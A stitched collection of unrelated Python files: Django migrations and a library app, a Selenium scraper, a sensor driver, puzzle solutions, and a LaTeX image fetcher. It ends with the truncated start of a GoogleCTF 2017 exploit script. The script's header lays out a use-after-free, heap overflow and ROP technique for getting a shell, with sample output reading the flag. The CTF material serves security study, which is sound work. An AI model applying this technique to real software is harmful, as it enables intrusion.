def Draw(self, pos):
pygame.draw.circle(self.drawSurface, self.drawColor, pos, self.size)
def Clear(self):
self.drawSurface = pygame.Surface(self.winSize, pygame.SRCALPHA, 32).convert_alpha()
def Update(self):
self.winSurface.blit(self.drawSurface, [0,0])
|
7,639 | bf160bd2fc924a11d340bd466b4a879d1cdcd86e | # Generated by Django 3.1.7 on 2021-03-20 14:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('restapp', '0021_auto_20210320_1421'),
]
operations = [
migrations.AddField(
model_name='order',
name='phone',
field=models.CharField(max_length=13, null=True),
),
migrations.AlterField(
model_name='order',
name='order_no',
field=models.CharField(default='G2QYWH30', max_length=10),
),
]
|
7,640 | 5f022b7f20b8aef1e3538a6b1e69dc302752cdc7 | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import re
import sys
import time
import os
# directory 현재 경로에 download폴더 생성
dirPath = "download"
try:
if not (os.path.isdir(dirPath)):
os.makedirs(os.path.join(dirPath))
except OSError as e:
print("{0} Failed to create directory!!!!!".format(dirPath))
# chrome download folder option
donwload_loc = "{0}\\download".format(os.getcwd())
options = webdriver.ChromeOptions()
options.add_experimental_option("prefs", {
"download.default_directory": donwload_loc,
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": False
})
# chrome driver 경로
chromedriver = '../chromedriver/chromedriver.exe'
driver = webdriver.Chrome(chromedriver, chrome_options=options)
# 제일 맨처음 URL
# url = 'http://www.k-heritage.tv/brd/board/909/L/CATEGORY/911/menu/901?brdType=R&thisPage=1&bbIdx=20474&searchField=&searchText='
# 중간 URL
url = 'http://www.k-heritage.tv/brd/board/909/L/CATEGORY/911/menu/901?brdType=R&thisPage=1&bbIdx=17438&searchField=&searchText='
while '#n' not in url:
#url 호출
driver.get(url)
# 해당 tag가 생성될 때 까지 기다림
mediaWrap = WebDriverWait(driver, 2).until(
EC.presence_of_element_located((By.CSS_SELECTOR, ".media_wrap")))
# 다음페이지 url 저장
next_url = driver.find_elements_by_css_selector('div.thumList>dl>dd>a')[0].get_attribute('href')
try:
# hwp 파일이 있는경우 저장
aTagList = driver.find_elements_by_css_selector("dl.b_file dd li a")
file_list = []
for aTag in aTagList:
if ".hwp" in aTag.text:
file_list.append(aTag.get_attribute('href'))
for file_url in file_list:
driver.get(file_url)
time.sleep(1.3)
# hwp 파일이 없으면 html 특정 태그를 xml로 저장
if len(file_list) == 0:
title = driver.find_elements_by_css_selector('p.sub_tit2 em.sub_mode')[0].text
# 윈도우에서 파일명에 저장할 수 없는 문자 제거
title = re.sub(r"[\\|\/|\:|\*|\?|\"|\<|\>|\|]",'',title)
xml_file = open('download\\{0}.xml'.format(title),mode="wt", encoding="utf-8")
xml_file.write(driver.find_elements_by_css_selector('div.type_cont')[0].get_attribute('innerHTML'))
except IndexError:
# 간혹 파일 다운로드 url이 오류가 발생하는 경우가 있음
driver.get(url)
mediaWrap = WebDriverWait(driver, 2).until(
EC.presence_of_element_located((By.CSS_SELECTOR, ".media_wrap")))
title = driver.find_elements_by_css_selector('p.sub_tit2 em.sub_mode')[0].text
title = re.sub(r"[\\|\/|\:|\*|\?|\"|\<|\>|\|]",'',title)
xml_file = open('download\\{0}.xml'.format(title),mode="wt", encoding="utf-8")
# 유형 확인
info_agree = driver.find_elements_by_css_selector('div.info_agree')
type_cont = driver.find_elements_by_css_selector('.media_wrap .type_cont')
card_cont_info = driver.find_elements_by_css_selector('.media_wrap .card_cont_info')
if len(info_agree) > 0:
xml_file.write(info_agree[0].get_attribute('innerHTML'))
elif len(type_cont) > 0:
xml_file.write(type_cont[0].get_attribute('innerHTML'))
elif len(card_cont_info) > 0:
xml_file.write(card_cont_info[0].get_attribute('innerHTML'))
except:
print("Unexpected error:", sys.exc_info()[0])
print('{0} error '.format(driver.current_url))
finally:
url = next_url
driver.quit()
|
7,641 | c12d45644098aef5c042a62095eeae5829d70f45 | #! /usr/bin/python
# encode:utf-8
import subprocess
import sys
import pdb
argvs = sys.argv
if len(argvs) != 2:
print "Please input 1 argument"
quit()
searchWord = argvs[1]
cmd1 = "ls -a /etc/"
p1 = subprocess.Popen(cmd1.strip().split(" "), stdout=subprocess.PIPE)
stdout_data, stderr_data = p1.communicate()
p1.stdout.close()
if stderr_data != None:
print "Error", stderr_data
quit()
filelist = stdout_data.strip().split("\n")
for file in filelist:
if file.find(searchWord) != -1:
print file
|
7,642 | ce9e1ac0f1596ba4db904289f91f5ab95c2de4b8 | from django.shortcuts import render,redirect
from django.http import HttpResponseRedirect
from . import forms,models
from django.contrib.auth.models import Group
from django.contrib import auth
from django.contrib.auth.decorators import login_required,user_passes_test
from datetime import datetime,timedelta,date
from django.core.mail import send_mail
from librarymanagement.settings import EMAIL_HOST_USER
from django.contrib import messages
#from django.contib.auth.models import user, auth
def home_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'library/index.html')
# for showing blog content to users
#for showing signup/login button for student
def studentclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'library/student_click.html')
#for showing signup/login button for teacher
def adminclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'library/admin_click.html')
def adminsignup_view(request):
form=forms.AdminSigupForm()
if request.method=='POST':
form=forms.AdminSigupForm(request.POST)
if form.is_valid():
user=form.save()
user.set_password(user.password)
user.save()
my_admin_group = Group.objects.get_or_create(name='ADMIN')
my_admin_group[0].user_set.add(user)
return HttpResponseRedirect('adminlogin')
return render(request,'library/admin_signup.html',{'form':form})
def studentsignup_view(request):
form1=forms.StudentUserForm()
form2=forms.StudentExtraForm()
mydict={'form1':form1,'form2':form2}
if request.method=='POST':
form1=forms.StudentUserForm(request.POST)
form2=forms.StudentExtraForm(request.POST)
if form1.is_valid() and form2.is_valid():
user=form1.save()
user.set_password(user.password)
user.save()
f2=form2.save(commit=False)
f2.user=user
user2=f2.save()
my_student_group = Group.objects.get_or_create(name='STUDENT')
my_student_group[0].user_set.add(user)
return HttpResponseRedirect('studentlogin')
return render(request,'library/student_signup.html',context=mydict)
def is_admin(user):
return user.groups.filter(name='ADMIN').exists()
def afterlogin_view(request):
if is_admin(request.user):
return render(request,'library/admin_afterlogin.html')
else:
return render(request,'library/student_afterlogin.html')
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def addbook_view(request):
#now it is empty book form for sending to html
form=forms.BookForm()
if request.method=='POST':
#now this form have data from html
form=forms.BookForm(request.POST)
if form.is_valid():
user=form.save()
return render(request,'library/book_added.html')
return render(request,'library/add_book.html',{'form':form})
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def viewbook_view(request):
books=models.Book.objects.all()
return render(request,'library/view_book.html',{'books':books})
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def issuebook_view(request):
form=forms.IssuedBookForm()
if request.method=='POST':
#now this form have data from html
form=forms.IssuedBookForm(request.POST)
if form.is_valid():
obj=models.IssuedBook()
obj.enrollment=request.POST.get('enrollment2')
obj.isbn=request.POST.get('isbn2')
obj.save()
return render(request,'library/book_issued.html')
return render(request,'library/issue_book.html',{'form':form})
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def viewissuedbook_view(request):
issuedbooks=models.IssuedBook.objects.all()
li=[]
for lb in issuedbooks:
issdate=str(lb.issuedate.day)+'-'+str(lb.issuedate.month)+'-'+str(lb.issuedate.year)
expdate=str(lb.expirydate.day)+'-'+str(lb.expirydate.month)+'-'+str(lb.expirydate.year)
#fine calculation
days=(date.today()-lb.issuedate)
print(date.today())
d=days.days
fine=0
if d>20:
day=d-20
fine=day*10
books=list(models.Book.objects.filter(isbn=lb.isbn))
students=list(models.StudentExtra.objects.filter(enrollment=lb.enrollment))
i=0
for l in books:
t=(students[i].get_name,students[i].enrollment,books[i].name,books[i].author,issdate,expdate,fine)
i=i+1
li.append(t)
return render(request,'library/view_issued_book.html',{'li':li})
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def viewstudent_view(request):
students=models.StudentExtra.objects.all()
return render(request,'library/view_student.html',{'students':students})
@login_required(login_url='studentlogin')
def viewissuedbookbystudent(request):
student=models.StudentExtra.objects.filter(user_id=request.user.id)
issuedbook=models.IssuedBook.objects.filter(enrollment=student[0].enrollment)
li1=[]
li2=[]
for ib in issuedbook:
books=models.Book.objects.filter(isbn=ib.isbn)
for book in books:
t=(request.user,student[0],book.name,book.author)
li1.append(t)
issdate=str(ib.issuedate.day)+'-'+str(ib.issuedate.month)+'-'+str(ib.issuedate.year)
expdate=str(ib.expirydate.day)+'-'+str(ib.expirydate.month)+'-'+str(ib.expirydate.year)
#fine calculation
days=(date.today()-ib.issuedate)
print(date.today())
d=days.days
fine=0
if d>20:
day=d-20
fine=day*10
t=(issdate,expdate,fine)
li2.append(t)
return render(request,'library/view_issued_book_bystudent.html',{'li1':li1,'li2':li2})
def aboutus_view(request):
return render(request,'library/about_us.html')
def contactus_view(request):
sub = forms.ContactusForm()
if request.method == 'POST':
sub = forms.ContactusForm(request.POST)
if sub.is_valid():
email = sub.cleaned_data['Email']
name=sub.cleaned_data['Name']
message = sub.cleaned_data['Message']
send_mail(str(name)+' || '+str(email),message, EMAIL_HOST_USER, ['mayankgourav2@gmail.com'], fail_silently = False)
return render(request, 'library/contact_us_success.html')
return render(request, 'library/contact_us.html', {'form':sub})
@login_required(login_url='studentlogin')
def viewbook_view(request):
books=models.Book.objects.all()
return render(request,'library/view_book.html',{'books':books})
def blog_view(request):
return render(request,'library/blogs.html') |
7,643 | c6d9b971ab6919846807b740313d450d086ecc23 | import VL53L1X
from sensor_msgs.msg import Range
class _VL53L1():
def __init__(self, address=0x29):
address = int(address, 16)
print("initialising sensor with address: {}".format(hex(address)))
try:
self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)
self.tof.open()
self.tof.start_ranging(0)
self.tof.set_timing(30000, 33)
except Exception as e:
print(e)
def set_range(self, rng):
if rng < 4 and rng >= 0:
self.tof.set_range()
else:
raise Exception("Invalid range: 1 - short, 2 - med, 3 - long")
def set_fov(self, mode):
if mode == "wide":
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
elif mode == "center":
roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)
elif mode == "top":
roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)
elif mode == "bottom":
roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)
elif mode == "left":
roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)
elif mode == "right":
roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)
else:
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
self.tof.set_user_roi(roi)
def read(self):
dist = self.tof.get_distance()
msg = Range()
msg.radiation_type = 1
msg.field_of_view = 27
msg.min_range = 0
msg.max_range = 400
msg.range = float(dist)
return msg |
7,644 | 6aa762165dba891a3638d13862019dd342a7e05a | # Generated by Django 3.0.1 on 2020-01-11 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0004_auto_20191230_2037'),
]
operations = [
migrations.AddField(
model_name='user',
name='circles',
field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'), ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG', 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리'),
),
migrations.AddField(
model_name='user',
name='department',
field=models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'), ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC', '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT', 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True, verbose_name='학과'),
),
migrations.AlterField(
model_name='user',
name='level',
field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2', 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3, max_length=18, verbose_name='등급'),
),
]
|
7,645 | c22651437094723b711a959e031f1c7f928f735a | data = [
"........#.............#........",
"...#....#...#....#.............",
".#..#...#............#.....#..#",
"..#......#..##............###..",
"..........#......#..#..#.......",
".#..#.......#.........#.#......",
".........#..#....##..#.##....#.",
"..#....##...#..................",
"##..........#.##...#....##..#..",
"...#....#...#..............#...",
"...........................#..#",
"..##.##.#..................#...",
"...#.##..#............#........",
"........#.......#...#.....##.#.",
".##..........#......#.......#..",
"...#..........#...#..#.......#.",
"......#...#...#.##.......#.#...",
"........#...#...#...##.........",
"#..............#.#....#.......#",
"..#..#..#.#....#...............",
".....#........#...#..........#.",
"##......#...#..#.##.......#....",
"..#.#.....#.#.............#.#.#",
"#..#..##......##...#...........",
"..#......#........#.....#......",
".....#.......#....#.#...#......",
"...#........#...........#...#..",
".......#.#...........###....#..",
"...#...........##....##........",
"#....#..####....#.....#..#....#",
"..........#...........#........",
"...#.......#....#.#.........#..",
"....#...#.......#..###.........",
"......#......#..#......#..#....",
"...#.....#............#..#.....",
"...#.#.#.#..#.......#.....#....",
"#....##...#.........#...##.....",
"#..#.......#..#..#..#...##.....",
"#.......#............#.....#...",
".#........##....##...#........#",
".....#...#.....................",
".......#........#..............",
".....#............#.#.#...#.#..",
".....##..#.............#.......",
"..#.##..#........#..#...#......",
".........#.#....#...........#..",
".#.....#..#....#.....#...#.....",
"....#.#................#.......",
"...............##......#...#...",
".##...#...#.......##.#....#....",
"............#........#.......#.",
"......##.#.#...................",
".#.#..............#.......#....",
"#.....#...#.......#..#...#.....",
".............#....#..#......#..",
"........#...##................#",
".......#...#..#..##............",
"..#..#...##...#..#.#.....#...#.",
".#.#...#.........#.#...........",
"...###....#.......#...#........",
"........#......##.#...#..##..#.",
".....................#.#.......",
".............#...........#...#.",
"#..#..#.....#.#...#............",
"...#....#.....#...........#....",
"..##.....##...#......#..##.....",
"#.....#.....###.#.....#....##..",
".#...........###...............",
"..................#..##.#...#..",
"................#....##.#......",
".#.#.#...#....#.........#..#.#.",
"#.......#........##............",
".......##.#....#.#............#",
"..........#..##.#....#.........",
"........##..#....#.............",
".........#....#...........##...",
"#.........#.#..#..#..........#.",
".....#........#......#.........",
"....#.#.#...............#......",
".#..#..##...#.##..........#....",
"..#....................#.#.....",
".........#....#...........#.#.#",
"........#....##.##.............",
"..#.....#.......#..#......#....",
"#..........#.#.....#.#....#....",
"........##.#.....#..#.....#.#..",
"...................#...#....#.#",
"............#..#....#...#...#..",
"..............#.#.........#....",
"...#..#..#.#..##..##...........",
".#...........................#.",
".#.......#...........#....#.#.#",
"......#..#...#........#...##...",
".........#......#.#.......#...#",
"...#..##................#......",
".............#.#..##....#.#....",
"...............#..#......#.....",
".#......#.#.#....#........#....",
"........#..#.##..#..#.........#",
"...#....#.#...#..#.......#..#..",
"..#...##.........#..#...#......",
"...#...........#.............#.",
"....#.....................#....",
".....#..#...............#.#...#",
"....#..........#........#......",
"..#....#........##..##.........",
"...#....#..#.#.......#...#.....",
"..#........#....#...##....#.#..",
".#...#........##.....#....###..",
"#....#....##......#........#...",
".........#..#.#..........#....#",
"....#...#.....#.......##.......",
"..............#..........#.##..",
"#...#..#..............#......#.",
".................#......##....#",
"..#..##..#.......#..#.#......#.",
".............#........#.....#.#",
".#.##............#..#..........",
"..#...#...........#..##........",
".#....#...#....#.......#.......",
"...#.#..#..#..#....#.....#..#..",
"....#..##..............#...#...",
"#..........###......###........",
".##.##......#..#............#..",
".#...........#.#.....#...#.....",
"#.#..#...#............#........",
".........#...#...#..........##.",
".......###..#..........#.......",
"...........###.....#........#..",
".#.............#.....#......#..",
"...#.....#....#.#.........##...",
"....##..##...#.......##........",
"......#....##.........#......#.",
"..........#.....##..#.....#..#.",
"..........####...#..#.........#",
".##....#..#.#...#.......#......",
"...#.#.##.#.#...#....#.#.#.....",
".........#...##........##.....#",
"..#........#..........##...##.#",
"##...##..........#.#...........",
"..............#......#.........",
"........#.....#.#.......#......",
".#...#.....#....#.#..#.........",
".....#....................##...",
"....#..................#.#...##",
".....#............#..##........",
"#..........#....#.#.......##.#.",
"....#..#.....................#.",
"#..#....##.....#...............",
"..#...#..#..##....#.#..........",
".......#......#.#.......#.....#",
"...#.#.......#...#.##..........",
"....#..........#....#.#.#......",
".......#..#..........#..##.....",
"#......#......#...#......#...#.",
"###..#....##......##........#..",
".#..........#.....#.......#.#..",
".......#.....#.....#.#.........",
"..#...#....#...................",
"..............#.##.............",
".#...#.......#.##...#.#.......#",
".......#......................#",
"....#.#...#.#........#.........",
".#......#....#...#.............",
"#.......#...###.....#.#.#..#...",
"#....##.#...............##.....",
"..#.......#..................#.",
".....####...............#......",
".##......#......#.#.......##.#.",
"#......##..###....#....#......#",
".##.......##.##...#.##.........",
"......##............#.......#..",
"......#..#.....##.#............",
".#..........#.....##...........",
"#.........#......#......##.#...",
".........#.......#..#......#.#.",
".........#.......#...........#.",
".#..##.#..................##...",
".............#.............#...",
".....##........#......##...##..",
"..#..#.#.....#..#....#.........",
".....#....#.....#.....#........",
"#......##.....#....#....#......",
"#.................#..#.#......#",
".......#..#......#....#.#...#.#",
"....#.........#..#..........#.#",
"##......#............#...#...#.",
"....##......#...#.....#....##..",
".#...##.........#..............",
"......#.....................#..",
"..#..........###....#..........",
"#....#...#..#.............#....",
"#........#.#......#....#.......",
".#...#.......#..#...#.#...#..#.",
"................##.#.....#.....",
"###.......#...#................",
"...#.......#...#.#.....#.......",
"..#.........#.....#.#.......#..",
"......#.......................#",
"#.....#.#..#....#.......#......",
"...#....#..#....####...........",
".............#.....#...##......",
".......#.........#...#..#......",
".##..#.........#....#.#........",
"....##...#.#...........#....#..",
".........................##....",
"..###.......##....#.#.........#",
".#....#.#.#...........##....#..",
"......#...#..#..#..#..#.......#",
"..#....#.#.......#..#..#..#...#",
".....##...#.##....#.#...#......",
".........#..#....#..#..........",
".##..##.........#.#.....#......",
"..........#...##...#.#...#.....",
"#.##..#..#.............#.......",
"...#...........#.......#......#",
".......#....#....#...##.......#",
"..#.##........###..#......#....",
"...#...........###......#..#..#",
".#.........#.#.........#.#.....",
"##.......##.##.##......##......",
"............#...#..........#...",
"....................#..........",
"...#..#...........#...#...#....",
".................#...#......###",
"...#................#.#.##.....",
"...............#........#......",
"#.............##......#.#..#...",
"..#.#.....#..#.##.....##...#...",
"......#.........#......#.......",
"#.......#......#....#........#.",
".#..##.....#.........#.........",
"....##.##.#...#.........##.#...",
"...............#..#..#..##.....",
".#..#...............###........",
".##............##..............",
"...............#...##...#...#.#",
"..#.#......#.#..#.............#",
"#.#..#..##.........#.#.#...#...",
"....##.#....................##.",
".........#..#.....#.....#..#..#",
"....#......#......#.##....#....",
"........###..#.............#..#",
"##................#.........#..",
"#.....#.......#....#...........",
"..#.......#..#........#....#...",
"..#.#.##..#.#...##........#.##.",
"..#..........#............#....",
"..........#...............##...",
"..........###........#.#.......",
".....###..#.............#......",
"##.............#...#.....#.....",
".....#......#....#........#.#..",
"............#..#..............#",
".................#...........##",
"#........#.........###.....#...",
"..#.#..............##......#.#.",
".#...........#.........#..##..#",
"...............................",
".#.....#..#....#....#......#...",
".#...#......#.#..#....#.......#",
"......#.##.......#......#......",
"......#..###..#................",
"#..#.....#........##...#.......",
"......##.........##....#...##..",
".#..........#.................#",
"#..#.......#...............#...",
".........#..###....#.#.##.#....",
"..#...#.##..##...............##",
".........#.....................",
".#....##...#......#....#.......",
"............#..........#..#....",
"...#......##....#....#........#",
".#...................#.........",
"#.#........###....#..........#.",
".........#....#....#........##.",
".#....#..#.........#..#........",
"...............#..#...#..#...##",
".........#....##....#......#...",
".#.............................",
"...#........#...#.#...#.#..#...",
".....#..##...#.#...............",
"#.....#....#.........#.........",
"#...#...........##.........#...",
"..##........#.#...#...#......#.",
"...........#.....#...#.#.......",
"......###....#.....#...........",
"......##...#..........#....#.#.",
".......##..##..........#.......",
"....#............#..#....##....",
"..##...................#.#.....",
"...#.#..#.#....................",
".#..##..#............##.###..#.",
"#.#...#....#.#..........#.#....",
"........#....#.....#...........",
"..##....#...#.......#..........",
"...........##.##....#..........",
".....#............#............",
".......#.............#....#....",
".................#......#......",
"......##.......#....#..##...#..",
".#..#....#.....................",
"...#.#.#...#......##...........",
"##........##.#....#....#.......",
".......#.....#..#..#...#.##....",
"#..........#....#.#..#..#..#...",
"...##..............#...........",
".........#.....#.#....#.......#",
".........#....##..#..##..#.....",
".....#......................#..",
"...###...#..#......#...........",
"....#.....................#....",
"...............................",
"..#.....###.......#..#....#....",
"#..........#.................#.",
"......#.......###.......#..##..",
".............#.##..............",
"......#..#.#..#...........#....",
"...#....##.#...#..#.#...#....#.",
"..................#...#....#.##",
"......#.#....#.................",
"......#.#.....#.....#..##......",
"#..##...........#..#.....#.##..",
]
def treeCounter(moveRight, moveDown):
row = 0
index = 0
trees = 0
finished = False
while not finished:
row += moveDown
if len(data) > row:
index = (index + moveRight) % len(data[row])
if data[row][index] == '#':
trees += 1
else:
finished = True
print(trees)
treeCounter(1,1)
treeCounter(3,1)
treeCounter(5,1)
treeCounter(7,1)
treeCounter(1,2) |
7,646 | 94a0b341aac3683712578b31e98a0a5a6a643b57 | # Pass Function
def hello_func():
pass
hello_func()
print(hello_func())
def hello_func():
hello_func()
print(hello_func)
# Function allows to reuse ,without repeat
def hello_func():
print('hello function!')
hello_func()
|
7,647 | 9a02e09cbfe2c9b6ebb9d20ba6cea639871f0838 | import datetime
import discord
def getTeams(reign, uprising, hunters, fuel, mayhem, gladiators, charge, outlaws, spark,
spitfire, excelsior, eternal, fusion, dynasty, shock, dragons, defiant, valiant, titans,
justice) :
teamList = discord.Embed(
title="Overwatch League Teams",
description="2021 Season\n"+
"**"+reign+"ATL-Atlanta Reign**\n"+
"**"+uprising+"BOS-Boston Uprising**\n"+
"**"+hunters+"CDH-Chengdu Hunters**\n"+
"**"+fuel+"DAL-Dallas Fuel**\n"+
"**"+mayhem+"FLA-Florida Mayhem**\n"+
"**"+gladiators+"GLA-Los Angeles Gladiators**\n"+
"**"+charge+"GZC-Guangzhou Charge**\n"+
"**"+outlaws+"HOU-Houston Outlaws**\n"+
"**"+spark+"HZS-Hangzhou Spark**\n"+
"**"+spitfire+"LDN-London Spitfire**\n"+
"**"+excelsior+"NYE-New York Excelsior**\n"+
"**"+eternal+"PAR-Paris Eternal**\n"+
"**"+fusion+"PHI-Philadelphia Fustion**\n"+
"**"+dynasty+"SEO-Seoul Dynasty**\n"+
"**"+shock+"SFS-San Francisco Shock**\n"+
"**"+dragons+"SHD-Shanghai Dragons**\n"+
"**"+defiant+"TOR-Toronto Defiant**\n"
"**"+valiant+"VAL-Los Angeles Valiant**\n"+
"**"+titans+"VAN-Vancouver Titans**\n"+
"**"+justice+"WAS-Washington Justice**",
color=discord.Colour.gold(),
timestamp=datetime.datetime.utcnow()
)
return teamList
|
7,648 | 547935a67fb079e551534126534234ceb96ed0dd | # Generated by Django 2.0.13 on 2019-05-23 14:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0001_initial'),
('users', '0003_user_projects'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='projects',
),
migrations.AddField(
model_name='user',
name='projects',
field=models.ManyToManyField(related_name='projects', to='projects.Project'),
),
]
|
7,649 | dbd04f7b88fa43ae920a6744e3979dbf917d3fc6 | import requests
import toml
from pathlib import Path
imgs:list
config:dict
def parseTex(lines:list):
new_lines = []
for i, line in enumerate(lines):
if line == "\n":
continue
inline = False
if (line[0] == "$" and line[1] != "$"):
inline = True
line = line.replace("$", "")
line = line.replace("\n", "")
line = line.replace(" ", "&space;")
line = line.replace("+", "+")
new_lines.append((line, inline))
return new_lines
def addColor(lines:list, color:str):
colortag = "{\color[RGB]{" + color + "}"
return ["""\inline""" + colortag + line[0] + "}" if(line[1]) else colortag + line[0] + "}" for line in lines]
if Path("config.toml").exists():
with open("config.toml", "r") as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {"colors": ["0, 0, 0"], "outputs": [""]}
else:
config = {"colors": ["0, 0, 0"], "outputs": [""]}
with open("tex.txt", "r") as tex:
imgs = tex.readlines()
imgs = parseTex(imgs) #returns a list of tuples, [0] is the parsed text, [1] is an inline boolean
for i, color in enumerate(config["colors"]):
coloredimgs = addColor(imgs, color)
output = "output" / Path(config["outputs"][i])
if (not output.exists()):
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = "https://latex.codecogs.com/svg.latex?" + tex
print(link)
r = requests.get(link)
with open(output / ("latex" + str(j) + ".svg"), "wb") as svg:
svg.write(r.content)
|
7,650 | a1ea0f269a20ff608d10ee01804eeee7e7232b1d | # -*- coding: utf-8 -*-
## https://atcoder.jp/contests/abs/tasks/abc083_b
import sys
def gets(input):
return input.readline().strip()
def run(input):
n, a, b = gets(input).split()
N, A, B = int(n), int(a), int(b)
#
total = 0
for i in range(1, N+1):
x = sum( int(ch) for ch in str(i) )
if A <= x <= B:
total += i
#
return total
def main():
result = run(sys.stdin)
print(result)
main()
|
7,651 | e4a05cbfd0959402eacf21959c68e449d15b1e74 | #!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert(all(b not in data for b in badchars))
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
lines = []
chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
